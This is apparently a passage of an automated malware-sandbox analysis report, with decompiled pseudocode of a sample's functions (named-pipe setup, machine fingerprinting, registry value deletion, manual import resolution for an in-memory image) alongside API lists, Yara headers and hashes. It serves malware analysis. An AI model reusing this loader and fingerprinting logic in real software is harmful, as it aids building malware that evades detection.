                                    				_t15 = _t61;
                                    				goto L12;
                                    			}

                                    APIs
                                    • GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
                                    • GetCurrentThread.KERNEL32(00000000), ref: 10001BCF
                                    • GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
                                    • DuplicateHandle.KERNEL32 ref: 10001BD9
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Current$Process$DuplicateHandleThread
                                    • String ID:
                                    • API String ID: 3566409357-0
                                    • Opcode ID: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
                                    • Instruction ID: 6a0302f5f4fd7db6b8bd225124d86af098f07b21623db759acfbad22203cc7cf
                                    • Opcode Fuzzy Hash: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
                                    • Instruction Fuzzy Hash: 50319C756083A19FF744DF64CCD886E77A9EB983D0B418968F601872A6DB30EC44CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Executed Functions

                                    C-Code - Quality: 79%
                                    			E000C31C2(void* __edx, void* __eflags) {
                                    				CHAR* _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				void* _v20;
                                    				signed int _t10;
                                    				intOrPtr _t11;
                                    				intOrPtr _t12;
                                    				void* _t16;
                                    				intOrPtr _t18;
                                    				intOrPtr _t22;
                                    				intOrPtr _t28;
                                    				void* _t38;
                                    				CHAR* _t40;
                                    
                                    				_t38 = __edx;
                                    				_t28 =  *0xde688; // 0xf0000
                                    				_t10 = E000CC292( *((intOrPtr*)(_t28 + 0xac)), __eflags);
                                    				_t40 = _t10;
                                    				_v8 = _t40;
                                    				if(_t40 != 0) {
                                    					_t11 = E000C8604(0x80000); // executed
                                    					 *0xde724 = _t11;
                                    					__eflags = _t11;
                                    					if(_t11 != 0) {
                                    						_t12 = E000CBD10(); // executed
                                    						_v16 = _t12;
                                    						__eflags = _t12;
                                    						if(_t12 != 0) {
                                    							_push(0xc);
                                    							_pop(0);
                                    							_v12 = 1;
                                    						}
                                    						_v20 = 0;
                                    						__eflags = 0;
                                    						asm("sbb eax, eax");
                                    						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
                                    						 *0xde674 = _t16;
                                    						__eflags = _t16 - 0xffffffff;
                                    						if(_t16 != 0xffffffff) {
                                    							E000CBC7A( &_v20, _t38); // executed
                                    							_t18 = E000C98EE(E000C32A1, 0, __eflags, 0, 0); // executed
                                    							__eflags = _t18;
                                    							if(_t18 != 0) {
                                    								goto L12;
                                    							}
                                    							_t22 =  *0xde684; // 0x27bf8f0
                                    							 *((intOrPtr*)(_t22 + 0x30))( *0xde674);
                                    							_push(0xfffffffd);
                                    							goto L11;
                                    						} else {
                                    							 *0xde674 = 0;
                                    							_push(0xfffffffe);
                                    							L11:
                                    							_pop(0);
                                    							L12:
                                    							E000C861A( &_v8, 0xffffffff);
                                    							return 0;
                                    						}
                                    					}
                                    					_push(0xfffffff5);
                                    					goto L11;
                                    				}
                                    				return _t10 | 0xffffffff;
                                    			}

                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: db7eda31075c865da5e648216ee2e6099e473afadaf18acdaabd6f3b714c174f
                                    • Instruction ID: d13159e9ccd9f4dddc0a4346f52e0233d29fb46ca893f90048703841fd8101b3
                                    • Opcode Fuzzy Hash: db7eda31075c865da5e648216ee2e6099e473afadaf18acdaabd6f3b714c174f
                                    • Instruction Fuzzy Hash: 6D21F8726051119AEB10BBB8EC45FAE37A8EB55374F20432EF525D71D1DE3085008761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E000C5A61(void* __eflags) {
                                    				intOrPtr _t2;
                                    				void* _t6;
                                    				void* _t7;
                                    
                                    				_t2 =  *0xde684; // 0x27bf8f0
                                    				 *((intOrPtr*)(_t2 + 0x108))(1, E000C5A06);
                                    				E000C5631(_t6, _t7); // executed
                                    				return 0;
                                    			}

                                    APIs
                                    • RtlAddVectoredExceptionHandler.NTDLL(00000001,000C5A06,000C5CE8), ref: 000C5A6D
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionHandlerVectored
                                    • String ID:
                                    • API String ID: 3310709589-0
                                    • Opcode ID: d6f4ad1c99d02ec48078a8cc1cbcb086cbc8fad2bc79094a378f4e47e8bbdcd8
                                    • Instruction ID: c73ec1648ac1b9eac1dd2e70802dc4e625edaa9747ea1c085a3dbdbdc41907be
                                    • Opcode Fuzzy Hash: d6f4ad1c99d02ec48078a8cc1cbcb086cbc8fad2bc79094a378f4e47e8bbdcd8
                                    • Instruction Fuzzy Hash: DBB092742515405BD640AB60CC8AF8C32909B64742F0100A4B2468A0F3CAE0A4C06612
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 79%
                                    			E000C4A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                                    				char _v516;
                                    				void _v1044;
                                    				char _v1076;
                                    				signed int _v1080;
                                    				signed int _v1096;
                                    				WCHAR* _v1100;
                                    				intOrPtr _v1104;
                                    				signed int _v1108;
                                    				intOrPtr _v1112;
                                    				intOrPtr _v1116;
                                    				char _v1144;
                                    				char _v1148;
                                    				void* __esi;
                                    				intOrPtr _t66;
                                    				intOrPtr _t73;
                                    				signed int _t75;
                                    				intOrPtr _t76;
                                    				signed int _t80;
                                    				signed int _t81;
                                    				WCHAR* _t87;
                                    				void* _t89;
                                    				signed int _t90;
                                    				signed int _t91;
                                    				signed int _t93;
                                    				signed int _t94;
                                    				WCHAR* _t96;
                                    				intOrPtr _t106;
                                    				intOrPtr _t107;
                                    				void* _t108;
                                    				intOrPtr _t109;
                                    				signed char _t116;
                                    				WCHAR* _t118;
                                    				void* _t122;
                                    				signed int _t123;
                                    				intOrPtr _t125;
                                    				void* _t128;
                                    				void* _t129;
                                    				WCHAR* _t130;
                                    				void* _t134;
                                    				void* _t141;
                                    				void* _t143;
                                    				WCHAR* _t145;
                                    				signed int _t153;
                                    				void* _t154;
                                    				void* _t178;
                                    				signed int _t180;
                                    				void* _t181;
                                    				void* _t183;
                                    				void* _t187;
                                    				signed int _t188;
                                    				WCHAR* _t190;
                                    				signed int _t191;
                                    				signed int _t192;
                                    				intOrPtr* _t194;
                                    				signed int _t196;
                                    				void* _t199;
                                    				void* _t200;
                                    				void* _t201;
                                    				void* _t202;
                                    				intOrPtr* _t203;
                                    				void* _t208;
                                    
                                    				_t208 = __fp0;
                                    				_push(_t191);
                                    				_t128 = __edx;
                                    				_t187 = __ecx;
                                    				_t192 = _t191 | 0xffffffff;
                                    				memset( &_v1044, 0, 0x20c);
                                    				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
                                    				_v1108 = 1;
                                    				if(_t187 != 0) {
                                    					_t123 =  *0xde688; // 0xf0000
                                    					_t125 =  *0xde68c; // 0x27bfab8
                                    					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
                                    				}
                                    				if(E000CBB8D(_t187) != 0) {
                                    					L4:
                                    					_t134 = _t128; // executed
                                    					_t66 = E000CB7A8(_t134,  &_v516); // executed
                                    					_push(_t134);
                                    					_v1104 = _t66;
                                    					E000CB67D(_t66,  &_v1076, _t206, _t208);
                                    					_t129 = E000C49C7( &_v1076,  &_v1076, _t206);
                                    					_t141 = E000CD400( &_v1076, E000CC379( &_v1076), 0);
                                    					E000CB88A(_t141,  &_v1100, _t208);
                                    					_t175 =  &_v1076;
                                    					_t73 = E000C2C8F(_t187,  &_v1076, _t206, _t208); // executed
                                    					_v1112 = _t73;
                                    					_t143 = _t141;
                                    					if(_t73 != 0) {
                                    						_push(0);
                                    						_push(_t129);
                                    						_push("\\");
                                    						_t130 = E000C92E5(_t73);
                                    						_t200 = _t199 + 0x10;
                                    						_t75 =  *0xde688; // 0xf0000
                                    						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
                                    						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
                                    							L12:
                                    							__eflags = _v1108;
                                    							if(__eflags != 0) {
                                    								_t76 = E000C91E3(_v1112);
                                    								_t145 = _t130;
                                    								 *0xde740 = _t76;
                                    								 *0xde738 = E000C91E3(_t145);
                                    								L17:
                                    								_push(_t145);
                                    								_t80 = E000C9B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
                                    								_t188 = _t80;
                                    								_t201 = _t200 + 0x10;
                                    								__eflags = _t188;
                                    								if(_t188 == 0) {
                                    									goto L41;
                                    								}
                                    								_push(0xdb9ca);
                                    								E000C9F48(0xe); // executed
                                    								E000C9F6C(_t188, _t208, _t130); // executed
                                    								_t194 = _a4;
                                    								_v1096 = _v1096 & 0x00000000;
                                    								_push(2);
                                    								_v1100 =  *_t194;
                                    								_push(8);
                                    								_push( &_v1100);
                                    								_t178 = 0xb; // executed
                                    								E000CA0AB(_t188, _t178, _t208); // executed
                                    								_t179 =  *(_t194 + 0x10);
                                    								_t202 = _t201 + 0xc;
                                    								__eflags =  *(_t194 + 0x10);
                                    								if( *(_t194 + 0x10) != 0) {
                                    									E000CA3ED(_t188, _t179, _t208);
                                    								}
                                    								_t180 =  *(_t194 + 0xc);
                                    								__eflags = _t180;
                                    								if(_t180 != 0) {
                                    									E000CA3ED(_t188, _t180, _t208); // executed
                                    								}
                                    								_t87 = E000C980C(0);
                                    								_push(2);
                                    								_v1100 = _t87;
                                    								_t153 = _t188;
                                    								_push(8);
                                    								_v1096 = _t180;
                                    								_push( &_v1100);
                                    								_t181 = 2; // executed
                                    								_t89 = E000CA0AB(_t153, _t181, _t208); // executed
                                    								_t203 = _t202 + 0xc;
                                    								__eflags = _v1108;
                                    								if(_v1108 == 0) {
                                    									_t153 =  *0xde688; // 0xf0000
                                    									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
                                    									if(__eflags != 0) {
                                    										_t90 = E000CFC1F(_t89, _t181, _t208, 0, _t130, 0);
                                    										_t203 = _t203 + 0xc;
                                    										goto L26;
                                    									}
                                    									_t153 = _t153 + 0x228;
                                    									goto L25;
                                    								} else {
                                    									_t91 =  *0xde688; // 0xf0000
                                    									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
                                    									if(__eflags != 0) {
                                    										L32:
                                    										__eflags =  *(_t91 + 0x1898) & 0x00000082;
                                    										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
                                    											_t183 = 0x64;
                                    											E000CE23E(_t183);
                                    										}
                                    										E000C52C0( &_v1076, _t208);
                                    										_t190 = _a8;
                                    										_t154 = _t153;
                                    										__eflags = _t190;
                                    										if(_t190 != 0) {
                                    											_t94 =  *0xde688; // 0xf0000
                                    											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
                                    											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
                                    												lstrcpyW(_t190, _t130);
                                    											} else {
                                    												_t96 = E000C109A(_t154, 0x228);
                                    												_v1100 = _t96;
                                    												lstrcpyW(_t190, _t96);
                                    												E000C85D5( &_v1100);
                                    												 *_t203 = "\"";
                                    												lstrcatW(_t190, ??);
                                    												lstrcatW(_t190, _t130);
                                    												lstrcatW(_t190, "\"");
                                    											}
                                    										}
                                    										_t93 = _a12;
                                    										__eflags = _t93;
                                    										if(_t93 != 0) {
                                    											 *_t93 = _v1104;
                                    										}
                                    										_t192 = 0;
                                    										__eflags = 0;
                                    										goto L41;
                                    									}
                                    									_t51 = _t91 + 0x228; // 0xf0228
                                    									_t153 = _t51;
                                    									L25:
                                    									_t90 = E000C553F(_t153, _t130, __eflags);
                                    									L26:
                                    									__eflags = _t90;
                                    									if(_t90 >= 0) {
                                    										_t91 =  *0xde688; // 0xf0000
                                    										goto L32;
                                    									}
                                    									_push(0xfffffffd);
                                    									L6:
                                    									_pop(_t192);
                                    									goto L41;
                                    								}
                                    							}
                                    							_t106 = E000CC292(_v1104, __eflags);
                                    							_v1112 = _t106;
                                    							_t107 =  *0xde684; // 0x27bf8f0
                                    							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                                    							__eflags = _t108 - _t192;
                                    							if(_t108 != _t192) {
                                    								_t109 =  *0xde684; // 0x27bf8f0
                                    								 *((intOrPtr*)(_t109 + 0x30))();
                                    								E000C861A( &_v1148, _t192);
                                    								_t145 = _t108;
                                    								goto L17;
                                    							}
                                    							E000C861A( &_v1144, _t192);
                                    							_t81 = 1;
                                    							goto L42;
                                    						}
                                    						_t116 =  *(_t75 + 0x1898);
                                    						__eflags = _t116 & 0x00000004;
                                    						if((_t116 & 0x00000004) == 0) {
                                    							__eflags = _t116;
                                    							if(_t116 != 0) {
                                    								goto L12;
                                    							}
                                    							L11:
                                    							E000CE286(_v1112, _t175);
                                    							goto L12;
                                    						}
                                    						_v1080 = _v1080 & 0x00000000;
                                    						_t118 = E000C95E1(_t143, 0x879);
                                    						_v1100 = _t118;
                                    						_t175 = _t118;
                                    						E000CBFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
                                    						E000C85D5( &_v1100);
                                    						_t200 = _t200 + 0x14;
                                    						goto L11;
                                    					}
                                    					_push(0xfffffffe);
                                    					goto L6;
                                    				} else {
                                    					_t122 = E000C2BA4( &_v1044, _t192, 0x105); // executed
                                    					_t206 = _t122;
                                    					if(_t122 == 0) {
                                    						L41:
                                    						_t81 = _t192;
                                    						L42:
                                    						return _t81;
                                    					}
                                    					goto L4;
                                    				}
                                    			}
                                    0x000c4b59
                                    0x000c4b15
                                    0x000c4b1f
                                    0x000c4b2b
                                    0x000c4b36
                                    0x000c4b3d
                                    0x000c4b47
                                    0x000c4b4c
                                    0x00000000
                                    0x000c4b4c
                                    0x000c4ae2
                                    0x00000000
                                    0x000c4a66
                                    0x000c4a71
                                    0x000c4a77
                                    0x000c4a79
                                    0x000c4d64
                                    0x000c4d64
                                    0x000c4d66
                                    0x000c4d6c
                                    0x000c4d6c
                                    0x00000000
                                    0x000c4a79

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$memset
                                    • String ID:
                                    • API String ID: 1985475764-0
                                    • Opcode ID: bbb91f8f85fc09bd0cb59870f16fccdce3466dba909f4f420023db500a225448
                                    • Instruction ID: e00079e0afd43232e147177fe6b1363a575de2813d944f784ff1f94eb2fb20e0
                                    • Opcode Fuzzy Hash: bbb91f8f85fc09bd0cb59870f16fccdce3466dba909f4f420023db500a225448
                                    • Instruction Fuzzy Hash: BE91AC71604300AFE754EB20D896FBE73E9BB84720F14492EF9558B2D2EB74DD048B52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 94%
                                    			E000CB7A8(WCHAR* __ecx, void* __edx) {
                                    				long _v8;
                                    				long _v12;
                                    				WCHAR* _v16;
                                    				short _v528;
                                    				short _v1040;
                                    				short _v1552;
                                    				WCHAR* _t27;
                                    				signed int _t29;
                                    				void* _t33;
                                    				long _t38;
                                    				WCHAR* _t43;
                                    				WCHAR* _t56;
                                    
                                    				_t44 = __ecx;
                                    				_v8 = _v8 & 0x00000000;
                                    				_t43 = __edx;
                                    				_t56 = __ecx;
                                    				memset(__edx, 0, 0x100);
                                    				_v12 = 0x100;
                                    				GetComputerNameW( &_v528,  &_v12);
                                    				lstrcpynW(_t43,  &_v528, 0x100);
                                    				_t27 = E000C95E1(_t44, 0xa88);
                                    				_v16 = _t27;
                                    				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                                    				asm("sbb eax, eax");
                                    				_v8 = _v8 &  ~_t29;
                                    				E000C85D5( &_v16);
                                    				_t33 = E000CC392(_t43);
                                    				E000C9640( &(_t43[E000CC392(_t43)]), 0x100 - _t33, L"%u", _v8);
                                    				lstrcatW(_t43, _t56);
                                    				_t38 = E000CC392(_t43);
                                    				_v12 = _t38;
                                    				CharUpperBuffW(_t43, _t38);
                                    				return E000CD400(_t43, E000CC392(_t43) + _t40, 0);
                                    			}
















                                    APIs
                                    • memset.MSVCRT ref: 000CB7C5
                                    • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 000CB7E0
                                    • lstrcpynW.KERNEL32(?,?,00000100), ref: 000CB7EF
                                    • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 000CB821
                                      • Part of subcall function 000C9640: _vsnwprintf.MSVCRT ref: 000C965D
                                    • lstrcatW.KERNEL32 ref: 000CB85A
                                    • CharUpperBuffW.USER32(?,00000000), ref: 000CB86C
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
                                    • String ID:
                                    • API String ID: 3410906232-0
                                    • Opcode ID: dfc5864c2b90876376009b67c939ce655e3198ce6944b79d75ab05716b14c094
                                    • Instruction ID: 2790561c89e92655b6e37f14f7a47cad77b00b55e4e119700a331dcc1739aec8
                                    • Opcode Fuzzy Hash: dfc5864c2b90876376009b67c939ce655e3198ce6944b79d75ab05716b14c094
                                    • Instruction Fuzzy Hash: 302156B2901218BFE714ABA4DC8AFEE77BCDF54310F10856AF505D6182EE75AF048B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 80%
                                    			E000C61B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
                                    				void* _v8;
                                    				int _v12;
                                    				int _v16;
                                    				int _v20;
                                    				char _v24;
                                    				char _v28;
                                    				void* _v32;
                                    				void* _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v56;
                                    				void _v576;
                                    				void* _t53;
                                    				intOrPtr _t72;
                                    				intOrPtr _t80;
                                    				intOrPtr _t81;
                                    				intOrPtr _t82;
                                    				signed int _t85;
                                    				intOrPtr _t87;
                                    				int _t89;
                                    				intOrPtr _t90;
                                    				intOrPtr _t92;
                                    				void* _t96;
                                    				void* _t97;
                                    				void* _t98;
                                    				void* _t99;
                                    				void* _t100;
                                    				void* _t108;
                                    
                                    				_t108 = __fp0;
                                    				_t96 = __edx;
                                    				_t89 = 0;
                                    				_v8 = 0;
                                    				memset( &_v576, 0, 0x208);
                                    				_v28 = 0x104;
                                    				_v20 = 0x3fff;
                                    				_v16 = 0;
                                    				_t53 = E000C8604(0x3fff); // executed
                                    				_t98 = _t53;
                                    				_t100 = _t99 + 0x10;
                                    				_v32 = _t98;
                                    				if(_t98 == 0) {
                                    					L18:
                                    					return 0;
                                    				}
                                    				_t97 = E000C8604(0x800);
                                    				_v36 = _t97;
                                    				if(_t97 == 0) {
                                    					goto L18;
                                    				}
                                    				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
                                    					L15:
                                    					if(_v8 != 0) {
                                    						RegCloseKey(_v8);
                                    					}
                                    					E000C861A( &_v32, 0x3fff); // executed
                                    					E000C861A( &_v36, 0x800); // executed
                                    					goto L18;
                                    				}
                                    				_push( &_v56);
                                    				_push( &_v40);
                                    				_push( &_v44);
                                    				_push( &_v48);
                                    				_push( &_v24);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push( &_v28);
                                    				_push( &_v576);
                                    				_t72 =  *0xde68c; // 0x27bfab8
                                    				_push(_v8);
                                    				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
                                    					__eflags = _v24;
                                    					if(_v24 == 0) {
                                    						goto L15;
                                    					}
                                    					_v12 = 0;
                                    					do {
                                    						memset(_t97, 0, 0x800);
                                    						memset(_t98, 0, 0x3fff);
                                    						_t100 = _t100 + 0x18;
                                    						_v20 = 0x3fff;
                                    						_v16 = 0x800;
                                    						 *_t98 = 0;
                                    						_t80 =  *0xde68c; // 0x27bfab8
                                    						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
                                    						__eflags = _t81;
                                    						if(_t81 == 0) {
                                    							_t82 =  *0xde690; // 0x27bfb90
                                    							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
                                    							__eflags = _t90;
                                    							if(_t90 != 0) {
                                    								_t92 =  *0xde68c; // 0x27bfab8
                                    								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
                                    								__eflags = _a16;
                                    								if(_a16 != 0) {
                                    									_t85 = E000CC392(_t90);
                                    									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
                                    									if(__eflags == 0) {
                                    										__eflags = 0;
                                    										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
                                    									}
                                    									E000CB1B1(_t90, _t96, __eflags, _t108);
                                    								}
                                    							}
                                    							_t89 = _v12;
                                    						}
                                    						_t89 = _t89 + 1;
                                    						_v12 = _t89;
                                    						__eflags = _t89 - _v24;
                                    					} while (_t89 < _v24);
                                    					goto L15;
                                    				}
                                    				_t87 =  *0xde68c; // 0x27bfab8
                                    				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
                                    				goto L15;
                                    			}

































                                    APIs
                                    • memset.MSVCRT ref: 000C61D2
                                      • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                    • RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 000C622C
                                    • memset.MSVCRT ref: 000C6295
                                    • memset.MSVCRT ref: 000C62A2
                                    • RegCloseKey.KERNEL32(00000000,?,?,00000001), ref: 000C6341
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: memset$AllocateCloseHeapOpen
                                    • String ID:
                                    • API String ID: 1886988140-0
                                    • Opcode ID: f6fa1eac9dcb17a81bba8c4404ec287a86c2780e00c12e61b3c54107ad2da9c9
                                    • Instruction ID: f078e681015c4581afc2321a8b200155c778797c9d6990bad354d136111ed3bb
                                    • Opcode Fuzzy Hash: f6fa1eac9dcb17a81bba8c4404ec287a86c2780e00c12e61b3c54107ad2da9c9
                                    • Instruction Fuzzy Hash: 33510EB1A00249AFEB61DF94CC85FEE7BBCEF04740F10806AF605AB152DB759A058B65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 94%
                                    			E000CCF84(void* __ecx) {
                                    				intOrPtr _t11;
                                    				long _t12;
                                    				intOrPtr _t17;
                                    				intOrPtr _t18;
                                    				struct _OSVERSIONINFOA* _t29;
                                    
                                    				_push(__ecx);
                                    				_t29 =  *0xde688; // 0xf0000
                                    				GetCurrentProcess();
                                    				_t11 = E000CBA05(); // executed
                                    				_t1 = _t29 + 0x1644; // 0xf1644
                                    				_t25 = _t1;
                                    				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
                                    				_t12 = GetModuleFileNameW(0, _t1, 0x105);
                                    				_t33 = _t12;
                                    				if(_t12 != 0) {
                                    					_t12 = E000C8FBE(_t25, _t33);
                                    				}
                                    				_t3 = _t29 + 0x228; // 0xf0228
                                    				 *(_t29 + 0x1854) = _t12;
                                    				 *((intOrPtr*)(_t29 + 0x434)) = E000C8FBE(_t3, _t33);
                                    				memset(_t29, 0, 0x9c);
                                    				_t29->dwOSVersionInfoSize = 0x9c;
                                    				GetVersionExA(_t29);
                                    				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
                                    				_t17 = E000CE3B6(_t3);
                                    				_t7 = _t29 + 0x220; // 0xf0220
                                    				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
                                    				_t18 = E000CE3F1(_t7); // executed
                                    				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
                                    				return _t18;
                                    			}









                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,?,000F0000,?,000C3545), ref: 000CCF90
                                    • GetModuleFileNameW.KERNEL32(00000000,000F1644,00000105,?,?,000F0000,?,000C3545), ref: 000CCFB1
                                    • memset.MSVCRT ref: 000CCFE2
                                    • GetVersionExA.KERNEL32(000F0000,000F0000,?,000C3545), ref: 000CCFED
                                    • GetCurrentProcessId.KERNEL32(?,000C3545), ref: 000CCFF3
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentProcess$FileModuleNameVersionmemset
                                    • String ID:
                                    • API String ID: 3581039275-0
                                    • Opcode ID: ce077deba676a9e204692a8621cf94e2ae9e6113a021fd017ecb45372178f67c
                                    • Instruction ID: 85beb0dd8ed8ae9ed765903e2ec244192ab05f814248cde92d819e8ab3455d73
                                    • Opcode Fuzzy Hash: ce077deba676a9e204692a8621cf94e2ae9e6113a021fd017ecb45372178f67c
                                    • Instruction Fuzzy Hash: B6019E709027009BE720AF71D84AFEABBE5EF80300F00082EF85683282EF746505CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 50%
                                    			E000D249B(signed int __eax, intOrPtr _a4) {
                                    				intOrPtr* _v8;
                                    				signed int* _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				signed int _v24;
                                    				signed int _v28;
                                    				intOrPtr _v32;
                                    				struct HINSTANCE__* _v36;
                                    				intOrPtr _v40;
                                    				signed int _v44;
                                    				struct HINSTANCE__* _v48;
                                    				intOrPtr _v52;
                                    				signed int _v56;
                                    				intOrPtr _v60;
                                    				signed int _v64;
                                    				signed int _t109;
                                    				signed int _t112;
                                    				signed int _t115;
                                    				struct HINSTANCE__* _t121;
                                    				void* _t163;
                                    
                                    				_v44 = _v44 & 0x00000000;
                                    				if(_a4 != 0) {
                                    					_v48 = GetModuleHandleA("kernel32.dll");
                                    					_v40 = E000CE099(_v48, "GetProcAddress");
                                    					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                    					_v32 = _v52;
                                    					_t109 = 8;
                                    					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                    						L24:
                                    						return 0;
                                    					}
                                    					_v56 = 0x80000000;
                                    					_t112 = 8;
                                    					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                    					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                    						_v8 = _v8 + 0x14;
                                    					}
                                    					_t115 = 8;
                                    					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                    					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                    						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
                                    						_v36 = _t121;
                                    						if(_v36 != 0) {
                                    							if( *_v8 == 0) {
                                    								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
                                    							} else {
                                    								_v12 =  *_v8 + _a4;
                                    							}
                                    							_v28 = _v28 & 0x00000000;
                                    							while( *_v12 != 0) {
                                    								_v24 = _v24 & 0x00000000;
                                    								_v16 = _v16 & 0x00000000;
                                    								_v64 = _v64 & 0x00000000;
                                    								_v20 = _v20 & 0x00000000;
                                    								if(( *_v12 & _v56) == 0) {
                                    									_v60 =  *_v12 + _a4;
                                    									_v20 = _v60 + 2;
                                    									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
                                    									_v16 = _v40(_v36, _v20);
                                    								} else {
                                    									_v24 =  *_v12;
                                    									_v20 = _v24 & 0x0000ffff;
                                    									_v16 = _v40(_v36, _v20);
                                    								}
                                    								if(_v24 != _v16) {
                                    									_v44 = _v44 + 1;
                                    									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                    										 *_v12 = _v16;
                                    									} else {
                                    										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
                                    									}
                                    								}
                                    								_v12 =  &(_v12[1]);
                                    								_v28 = _v28 + 4;
                                    							}
                                    							_v8 = _v8 + 0x14;
                                    							continue;
                                    						}
                                    						_t163 = 0xfffffffd;
                                    						return _t163;
                                    					}
                                    					goto L24;
                                    				}
                                    				return __eax | 0xffffffff;
                                    			}
























                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000D24B8
                                    • LoadLibraryA.KERNEL32(00000000), ref: 000D2551
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: HandleLibraryLoadModule
                                    • String ID: GetProcAddress$kernel32.dll
                                    • API String ID: 4133054770-1584408056
